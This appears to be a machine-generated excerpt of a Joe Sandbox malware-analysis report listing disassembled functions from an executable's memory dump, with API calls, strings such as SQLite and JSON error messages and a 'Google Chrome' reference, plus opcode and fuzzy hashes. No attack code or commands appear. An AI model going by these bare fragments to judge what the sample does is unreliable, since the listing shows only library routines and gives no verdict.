Function 004CF340 Relevance: 10.6, APIs: 7, Instructions: 90COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?), ref: 004CF347
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 004CF3F4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 004CF3FD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 004CF406
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 004CF40F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 004CF418
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 004CF41F

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: free$_time64
String ID:
API String ID: 3087401894-0
Opcode ID: 8feb370232cd2f9afa4bb86e95a1e1d6c99dca7ea192ad856108c4404c677f95
Instruction ID: 859d372d662de6a06b963bd15ef579e4b16a521060778d06209cd7dc8e2989bc
Opcode Fuzzy Hash: 8feb370232cd2f9afa4bb86e95a1e1d6c99dca7ea192ad856108c4404c677f95
Instruction Fuzzy Hash: A731AE755047008FCB688F04D984A5A7BA2FF68310F14477EEE998B3A1D73CA848CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004051B0 Relevance: 10.6, APIs: 7, Instructions: 82COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,3A5313C3,00000000,?,?,0052C216,000000FF,?,00404E7E), ref: 004051E2
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,0052C216,000000FF), ref: 004051FD
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,0052C216,000000FF), ref: 00405221
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,00000000,?,?,0052C216,000000FF), ref: 00405242
std::_Facet_Register.LIBCPMT ref: 0040525B
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,0052C216,000000FF), ref: 00405276
Concurrency::cancel_current_task.LIBCPMT ref: 0040529A

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
String ID:
API String ID: 762505753-0
Opcode ID: 81a8de5a542fcaf243c5429bcddd0e1b31f3870f967079cdb31ac55d234fa1d7
Instruction ID: b011e2e0799235080de31446f37d3255a851b78050d9d09294fafcb02a49e2f3
Opcode Fuzzy Hash: 81a8de5a542fcaf243c5429bcddd0e1b31f3870f967079cdb31ac55d234fa1d7
Instruction Fuzzy Hash: D631AB75D006148FCB10DF94D848A6FBBB8EF18720F0545AAE805A73A1DB38AD05CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004C7460 Relevance: 10.6, APIs: 7, Instructions: 82COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,3A5313C3,004C7D4B,00000000,?,0052C216,000000FF,?,004C6C8C), ref: 004C7492
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 004C74AD
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140 ref: 004C74D1
?_Getcat@?$ctype@_W@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,00000000), ref: 004C74F2
std::_Facet_Register.LIBCPMT ref: 004C750B
??1_Lockit@std@@QAE@XZ.MSVCP140 ref: 004C7526
Concurrency::cancel_current_task.LIBCPMT ref: 004C754A

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$ctype@_Getgloballocale@locale@std@@Locimp@12@RegisterV42@@Vfacet@locale@2@W@std@@std::_
String ID:
API String ID: 3972169111-0
Opcode ID: cbaea87fcfa5d980afa618fe32b85faca79a91ecb09727f3a9dbf0c47a3267a6
Instruction ID: 2c6d292183bca07081af9c0750e71e94f1ef98e04b291f00fdefb60cbd6f2b4a
Opcode Fuzzy Hash: cbaea87fcfa5d980afa618fe32b85faca79a91ecb09727f3a9dbf0c47a3267a6
Instruction Fuzzy Hash: 6F31CE79D042149FCB14DFA4D948BAFBBB4FF04720F05465AE805AB7A1DB38AD04CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0052006D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0055D22C,?,?,00401E65,0055DADC,00531A80), ref: 00520077
LeaveCriticalSection.KERNEL32(0055D22C,?,?,00401E65,0055DADC,00531A80), ref: 005200AA
RtlWakeAllConditionVariable.NTDLL ref: 00520121
SetEvent.KERNEL32(?,00401E65,0055DADC,00531A80), ref: 0052012B
ResetEvent.KERNEL32(?,00401E65,0055DADC,00531A80), ref: 00520137

Strings

@MD, xrefs: 0052011B

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
String ID: @MD
API String ID: 3916383385-3149783059
Opcode ID: 873f5688cc5e9c8075334d861b94ac1dc9ce378853f5d376219e07040a933898
Instruction ID: 64182cc32e01a6d8862f72187a028686ac400496d156f51040876bc7d47a3a54
Opcode Fuzzy Hash: 873f5688cc5e9c8075334d861b94ac1dc9ce378853f5d376219e07040a933898
Instruction Fuzzy Hash: 37018C3A501620DFC715AF58FC688997BB5FB2E312B02016AF90183771CB309C19EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 004EE110 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 198COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004EE1F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004EE2E1

Strings

%2I64d:%02I64d:%02I64d, xrefs: 004EE23B
%7I64dd, xrefs: 004EE30A
%3I64dd %02I64dh, xrefs: 004EE2ED

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd
API String ID: 885266447-564197712
Opcode ID: 3dfe548e41d4c191ababada973605bfb0243539f3f62ba01c015a88d605bde52
Instruction ID: 1ec50ab9979aa560b385393945f5b61e349d5f90268907d267851e687b060806
Opcode Fuzzy Hash: 3dfe548e41d4c191ababada973605bfb0243539f3f62ba01c015a88d605bde52
Instruction Fuzzy Hash: 2A516576B043041BE3089E2ECC41B2EFAD5EBC8314F494A3EF948D3392E5B9DD044285

Uniqueness

Uniqueness Score: -1.00%

Function 004330D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 194COMMON

Download Yara Rule

APIs

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

Part of subcall function 00404C60: memmove.VCRUNTIME140(00000000,?,?), ref: 00404D3C

Part of subcall function 0040F3E0: memmove.VCRUNTIME140(00000000,?,?, at line ,?,3A5313C3), ref: 0040F4C1

Part of subcall function 0040F2E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,3A5313C3,00000000,00000000,00434600,000001F4,Function_00144378,00000000,other_error,0000000B,3A5313C3,00000028), ref: 0040F35E

Part of subcall function 004323A0: memmove.VCRUNTIME140(00000000,00000000,?,-00000010,3A5313C3,3A5313C3,00000000), ref: 00432459
Part of subcall function 004323A0: memmove.VCRUNTIME140(?,00000000,?,parse error,?,00000000,00000000,?,-00000010,3A5313C3,3A5313C3,00000000), ref: 004324B7

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0043329C
__std_exception_copy.VCRUNTIME140(?,?), ref: 004332EB
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0043332A

Strings

e, xrefs: 004332D1
parse_error, xrefs: 00433115

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$_invalid_parameter_noinfo_noreturn$__std_exception_copy
String ID: e$parse_error
API String ID: 1978020537-2226855385
Opcode ID: 0666b71cc6f16cc978f7213db8c9bfcede17151a3bcb6dcc5b0480152394cd5c
Instruction ID: decf4bbfaded9096e2520ac896a786909636e6d4855da0c76d3fc89b045f707f
Opcode Fuzzy Hash: 0666b71cc6f16cc978f7213db8c9bfcede17151a3bcb6dcc5b0480152394cd5c
Instruction Fuzzy Hash: 7B7104709002089BEB18DF68DD8879EBBB1FF8A314F10C19DE405AB2C5DB799A848B54

Uniqueness

Uniqueness Score: -1.00%

Function 0040F3E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171COMMON

Download Yara Rule

APIs

Part of subcall function 0042DAF0: memmove.VCRUNTIME140(00000000,00000001,00000002,00000000,3A5313C3,?), ref: 0042DBCC

Part of subcall function 00427FB0: memmove.VCRUNTIME140(?,00000001,00000002,3A5313C3,?,00000000,?,0042A221,[json.exception.,00000010,3A5313C3,3A5313C3), ref: 00427FEC

memmove.VCRUNTIME140(00000000,?,?, at line ,?,3A5313C3), ref: 0040F4C1
memmove.VCRUNTIME140(00000010,?,?,, column ,?,00000000,00000000,?, at line ,?,3A5313C3), ref: 0040F51F
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?,, column ,?,00000000,00000000,?, at line ,?,3A5313C3), ref: 0040F5A6

Part of subcall function 004055E0: memmove.VCRUNTIME140(00000000,7FFFFFFF,00000000,?,00000000), ref: 004056B1
Part of subcall function 004055E0: memmove.VCRUNTIME140(00000000,?,?,00000000,7FFFFFFF,00000000,?,00000000), ref: 004056C2

Part of subcall function 004055E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000), ref: 00405705
Part of subcall function 004055E0: memmove.VCRUNTIME140(00000000,?,00000000,?,00000000), ref: 0040570D
Part of subcall function 004055E0: memmove.VCRUNTIME140(7FFFFFFF,?,?,00000000,?,00000000,?,00000000), ref: 00405719

Strings

, column , xrefs: 0040F4E0
at line , xrefs: 0040F480

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$_invalid_parameter_noinfo_noreturn
String ID: at line $, column
API String ID: 2580228974-191570568
Opcode ID: 77d5d7e225124120ad5d8add8d572625db265a22b470fa2672853413c1a8cc4a
Instruction ID: 57146d0d60a329db11556405f46e10eed9d9ad80d478f578a4a27b2862eeedef
Opcode Fuzzy Hash: 77d5d7e225124120ad5d8add8d572625db265a22b470fa2672853413c1a8cc4a
Instruction Fuzzy Hash: F951F171A002059FDB18CF68DD84BAEBBB6FF89300F10453AE411A77D2D778A944CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004CE2E0 Relevance: 8.8, APIs: 7, Instructions: 41COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,004CEE7D,?), ref: 004CE305
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,004CEE7D,?), ref: 004CE30E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,004CEE7D,?), ref: 004CE317
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,004CEE7D,?), ref: 004CE320
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,004CEE7D,?), ref: 004CE329
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,004CEE7D,?), ref: 004CE330
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,004CEE7D,?), ref: 004CE346

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 9c65b8b2adaa2c65d281bb60c48ce3be577713d4645a35692022b947e3c6099b
Instruction ID: 0cd631f8c639b493ddbc9568c00aa00fc018b76d3abd5624a6e3f661392e595d
Opcode Fuzzy Hash: 9c65b8b2adaa2c65d281bb60c48ce3be577713d4645a35692022b947e3c6099b
Instruction Fuzzy Hash: 67018C3A0113109FC7611F91ED4CE0BBB75FF50716B84062DEB5A52230EB2A7828AB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0052013F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,005200DC,00000064), ref: 00520162
LeaveCriticalSection.KERNEL32(0055D22C,0000000F,?,005200DC,00000064,?,?,00401E33,0055DADC), ref: 0052016C
WaitForSingleObjectEx.KERNEL32(0000000F,00000000,?,005200DC,00000064,?,?,00401E33,0055DADC), ref: 0052017D
EnterCriticalSection.KERNEL32(0055D22C,?,005200DC,00000064,?,?,00401E33,0055DADC), ref: 00520184

Strings

@MD, xrefs: 0052015C

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID: @MD
API String ID: 3269011525-3149783059
Opcode ID: d1d13f1d75f1f797d800c6dc1b11d3715da1578d713ce1ad677ddd282e02bf79
Instruction ID: d4d9e00f4e8fc5bac6381915525d7309bfe141dcc0e7fd1b85529e3c05ee52db
Opcode Fuzzy Hash: d1d13f1d75f1f797d800c6dc1b11d3715da1578d713ce1ad677ddd282e02bf79
Instruction Fuzzy Hash: BBE01237941A24BBC7212B90FD1899E7E39FF19762F004015FA09962B186619919FBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0046D024 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 376COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(00000020,?,?), ref: 0046D0B1

Strings

cannot release savepoint - SQL statements in progress, xrefs: 004708A0
no such savepoint: %s, xrefs: 0046D152
cannot open savepoint - SQL statements in progress, xrefs: 00470871
statement aborts at %d: [%s] %s, xrefs: 0046CB8C

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove
String ID: cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$statement aborts at %d: [%s] %s
API String ID: 2162964266-4278080707
Opcode ID: 51e0c03d004a09615e7356d05e0585978dbe453aed955bacd9db4c7b0ae6a3db
Instruction ID: a47ae42f596e55766c75ce7236125209df82de23933d2bca410cb77d9842e5ec
Opcode Fuzzy Hash: 51e0c03d004a09615e7356d05e0585978dbe453aed955bacd9db4c7b0ae6a3db
Instruction Fuzzy Hash: D9F15F74E006168FDB24DF25C889BAAB7B1BF45308F1445EAD84D97342EB35AD81CF86

Uniqueness

Uniqueness Score: -1.00%

Function 0050B030 Relevance: 7.8, APIs: 6, Instructions: 252stringCOMMON

Download Yara Rule

APIs

strchr.VCRUNTIME140(?,0000000D,?,?,00000000,004DB797,?,?,?), ref: 0050B04C
strchr.VCRUNTIME140(?,0000000A), ref: 0050B05D
memmove.VCRUNTIME140(?,?,00000001,?,?,?,?,?), ref: 0050B141

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: strchr$memmove
String ID:
API String ID: 1080442166-0
Opcode ID: 90ff863e359983bab1e637f9af6a924aeccf6cfd2727acfcad4137c27cfccad4
Instruction ID: c96277feb8f97b852cc6f9d9c76a2401003efabe072a886341c13975b44e8620
Opcode Fuzzy Hash: 90ff863e359983bab1e637f9af6a924aeccf6cfd2727acfcad4137c27cfccad4
Instruction Fuzzy Hash: F2713B7690424A4FFF308F6898D57EFBF95FB56310F48016AE9944B2C2D7258C16C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00524230 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 232COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000002), ref: 005243E0
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,00000002), ref: 00524426
_CxxThrowException.VCRUNTIME140(?,hdIU,filesystem::recursive_directory_iterator increment error,?,?,?,?,?,?,00000002), ref: 005244F0

Strings

hdIU, xrefs: 005244E7
filesystem::recursive_directory_iterator increment error, xrefs: 005244D3

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: CloseExceptionHandleThrowfree
String ID: filesystem::recursive_directory_iterator increment error$hdIU
API String ID: 1599805300-2241606067
Opcode ID: 1d0e51d3ca7544fb2fd90203f479938d829ba6c3db05c6599f9682bfa669e3ea
Instruction ID: b1cc722b797b30d00ea71fc6ece9faa195805c04ffbd76b9f6781ffb0e5ff2b0
Opcode Fuzzy Hash: 1d0e51d3ca7544fb2fd90203f479938d829ba6c3db05c6599f9682bfa669e3ea
Instruction Fuzzy Hash: 2E81DE709007299BDF20DF64E8447ADBFF4BF16328F24861AE814A72C1D775AA85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0044A2C0 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 195COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?), ref: 0044A332
memmove.VCRUNTIME140(?,?,?), ref: 0044A34E

Strings

delayed %dms for lock/sharing conflict, xrefs: 0044A445
winWrite2, xrefs: 0044A490
winWrite1, xrefs: 0044A4BD

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove
String ID: delayed %dms for lock/sharing conflict$winWrite1$winWrite2
API String ID: 2162964266-1291519147
Opcode ID: 162d39f6ae3baafa093d46ed1c7985fa095cc5728cb36e85d1509019b133ba5d
Instruction ID: a78e68a69208ad706a6ad1d7ed8d46757fe59ab26c461bc346e0214d434a6adb
Opcode Fuzzy Hash: 162d39f6ae3baafa093d46ed1c7985fa095cc5728cb36e85d1509019b133ba5d
Instruction Fuzzy Hash: 4461E071E402099FEB14DFA9D8845EEBBB1FF88304F24812BE805E7350E6389D558B96

Uniqueness

Uniqueness Score: -1.00%

Function 004572B0 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?), ref: 00457309
memmove.VCRUNTIME140(?,?), ref: 00457384
memset.VCRUNTIME140(?,00000000,?), ref: 004573CF

Strings

f66f7a17b78ba617acde90fc810107f34f1a1f2e, xrefs: 004573E2, 00457407, 0045742C
database corruption at line %d of [%.10s], xrefs: 004573EC, 00457411, 00457436

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$memset
String ID: database corruption at line %d of [%.10s]$f66f7a17b78ba617acde90fc810107f34f1a1f2e
API String ID: 3790616698-98515035
Opcode ID: 96aebf1cf21e5024f32c3dff6e012688754e1e8ebde82f470d095bf51ff5be1b
Instruction ID: 7bfeb18587480404bf4c823ffa7c82430ba17c8b12abf9bcf47541c803f583ed
Opcode Fuzzy Hash: 96aebf1cf21e5024f32c3dff6e012688754e1e8ebde82f470d095bf51ff5be1b
Instruction Fuzzy Hash: C351E571E042155BDB10DFADD881AAEFFB0FB44315F1441AEE858E7382D3359905CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004411AD Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 204COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004411DA
Concurrency::cancel_current_task.LIBCPMT ref: 004411F7

Part of subcall function 0052040F: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00405356,00000038,?,?,811C9DC5,3A5313C3,?,?), ref: 00520424

Strings

), xrefs: 00441287
(, xrefs: 00441282

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID: ($)
API String ID: 1934640635-2051389312
Opcode ID: 43fc2e57acf157009a4d4c3f4097e57e7cd572750df974a50b394309a2e77f46
Instruction ID: 1856a5a22f59ff11a8043eea3a51d8724be62ff6346c5b8e39e1c58f401dd8b0
Opcode Fuzzy Hash: 43fc2e57acf157009a4d4c3f4097e57e7cd572750df974a50b394309a2e77f46
Instruction Fuzzy Hash: 0051EF307002045FFB38CE28D495B7B77A2AF65340F28856BD986D7BB1DA6DACC18749

Uniqueness

Uniqueness Score: -1.00%

Function 0042F453 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180stringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?,00000000,?,?,00000000,?,?,?), ref: 0042F6C5
strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0(3A5313C3,00000000,0000000A), ref: 0042F6E6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 0042F6F5

Part of subcall function 00405740: memmove.VCRUNTIME140(00000000,00000001,00000000,?,00000000), ref: 004057F9

Strings

invalid number; expected '+', '-', or digit after exponent, xrefs: 0042F67A

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _errno$memmovestrtoull
String ID: invalid number; expected '+', '-', or digit after exponent
API String ID: 3546919614-3860655247
Opcode ID: daca683fa029fda4fe4684c8ae7445f0a673e7babb01f7995ffb9b8ef0d18fc6
Instruction ID: ea1a186525bf20a0532e8ba1327962f1e52a089dc2104a447c4e5e9e4624825e
Opcode Fuzzy Hash: daca683fa029fda4fe4684c8ae7445f0a673e7babb01f7995ffb9b8ef0d18fc6
Instruction Fuzzy Hash: 0971F1746046558FC724DF28D490A29FBF1FF19304F94067ED48187752C739954ACBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0043F0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

Part of subcall function 00404C60: memmove.VCRUNTIME140(00000000,?,?), ref: 00404D3C

Part of subcall function 0040F2E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,3A5313C3,00000000,00000000,00434600,000001F4,Function_00144378,00000000,other_error,0000000B,3A5313C3,00000028), ref: 0040F35E

Part of subcall function 004322B0: memmove.VCRUNTIME140(00000000,?,?,00FA81C1,3A5313C3,00000000), ref: 00432359

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0043F211
__std_exception_copy.VCRUNTIME140(?,?), ref: 0043F25B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000), ref: 0043F297

Strings

type_error, xrefs: 0043F0FE

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemmove$__std_exception_copy
String ID: type_error
API String ID: 2013804569-1406221190
Opcode ID: 681acdb95d1c8215acb91541708d88ac87685d51081595873fde44ea03107eac
Instruction ID: ed3b352f5f4581fb46e37fa564236d97ff7ffcfa2f32ae3393b25d15581f866e
Opcode Fuzzy Hash: 681acdb95d1c8215acb91541708d88ac87685d51081595873fde44ea03107eac
Instruction Fuzzy Hash: 6D51C471D002089BEB18DFA4ED48B9EBFB1EF89314F108229E015AB2C5D7755984CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004C83F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 004C81A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(0000000F,0000000F,00000000,00000000,3A5313C3,0000000F), ref: 004C82BE

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,3A5313C3,00000000,3A5313C3,?,?,?,00000000), ref: 004C8494
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,3A5313C3,00000000,3A5313C3,?,?,?,00000000), ref: 004C8560

Strings

false, xrefs: 004C84F4
true, xrefs: 004C84B8

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$tolower
String ID: false$true
API String ID: 877899113-2658103896
Opcode ID: 0ee14e28554ca2ce4bc96b1d561b1f938f071eafb79fb775c8a1a8c6f4fae6fe
Instruction ID: 639993627cc4efa5785979c5b060c3ba00d619417283eba5a5c67f1f9703a11f
Opcode Fuzzy Hash: 0ee14e28554ca2ce4bc96b1d561b1f938f071eafb79fb775c8a1a8c6f4fae6fe
Instruction Fuzzy Hash: 7D51FF75E002089FDF10CFA8D885BEEBBB4EF58304F64801EE81177382DA75A805CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0044A4E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 0044A51B

Strings

winSeekFile, xrefs: 0044A56A
winTruncate1, xrefs: 0044A587
winTruncate2, xrefs: 0044A5B5

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: __allrem
String ID: winSeekFile$winTruncate1$winTruncate2
API String ID: 2933888876-2471937615
Opcode ID: d1b9fd69bbe62cd98cfad643fb03d00417bc98be952c9b17a826f05fd54e4063
Instruction ID: a8ff908cb15bf98cb3d0c4edb1a6d1f375db7e926d83f5cd037b4d424777da3c
Opcode Fuzzy Hash: d1b9fd69bbe62cd98cfad643fb03d00417bc98be952c9b17a826f05fd54e4063
Instruction Fuzzy Hash: 3931C171240701AFE720DF39DD8196BB7E5FB84710B048A2EF996C3690EA34EC148B67

Uniqueness

Uniqueness Score: -1.00%

Function 0052113B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__current_exception.VCRUNTIME140 ref: 0052117A
__current_exception_context.VCRUNTIME140 ref: 00521184
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0052118B

Strings

csm, xrefs: 00521145

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

